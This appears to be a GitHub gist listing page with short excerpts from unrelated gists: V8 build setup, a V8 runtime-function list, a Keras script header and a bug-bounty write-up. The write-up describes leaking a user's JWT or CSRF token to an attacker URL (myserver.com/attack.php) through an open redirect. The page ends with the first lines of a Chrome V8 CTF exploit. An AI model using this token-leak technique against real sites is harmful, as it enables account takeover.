- Install Xcode (Avaliable on the Mac App Store)
- Install Xcode Command Line Tools (Preferences > Downloads)
- Install depot_tools
$ git clone https://chromium.googlesource.com/chromium/tools/depot_tools.git$ nano ~/.zshrc- Add
path=('/path/to/depot_tools' $path)
totherik
/ gist:3a4432f26eea1224ceeb
Last active
November 16, 2024 16:38
v8 --allow-natives-syntax RuntimeFunctions
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Per https://code.google.com/p/v8/codesearch#v8/trunk/src/runtime.cc | |
| %CreateSymbol | |
| %CreatePrivateSymbol | |
| %CreateGlobalPrivateSymbol | |
| %NewSymbolWrapper | |
| %SymbolDescription | |
| %SymbolRegistry | |
| %SymbolIsPrivate |
fchollet
/ classifier_from_little_data_script_2.py
Last active
September 13, 2023 03:34
Updated to the Keras 2.0 API.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| '''This script goes along the blog post | |
| "Building powerful image classification models using very little data" | |
| from blog.keras.io. | |
| It uses data that can be downloaded at: | |
| https://www.kaggle.com/c/dogs-vs-cats/data | |
| In our setup, we: | |
| - created a data/ folder | |
| - created train/ and validation/ subfolders inside data/ | |
| - created cats/ and dogs/ subfolders inside train/ and validation/ | |
| - put the cat pictures index 0-999 in data/train/cats |
stefanocoding
/ csrf_jwt_redirect_leak.md
Created
May 15, 2019 23:46
An open redirect was almost everything I needed in two different bug bounty programs to get access to user accounts. In one of the cases a JWT was leaked, and in the other the CSRF token was leaked. The issue was mostly the same in both cases: not validating, or URI encoding, user input in the client-side, and sending sensitive information to my server using an open redirect.
- There is an open redirect on https://example.com/redirect?url=https://myserver.com/attack.php
- User loads https://example.com/?code=VALUE
- Javascript code in https://example.com/ makes a GET request to https://example.com/verify/VALUE with a header
x-csrf-tokenset to the CSRF token for the session of the userGET /verify/VALUE HTTP/1.1 Host: example.com
vngkv123
/ TFC2021-Chrome-V8.mjs
Last active
November 5, 2021 06:35
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import * as module from "1.mjs"; | |
| /* | |
| => 1.mjs | |
| export let x = {}; | |
| export let y = {}; | |
| export let z = {}; | |
| */ | |
| var f64 = new Float64Array(1); |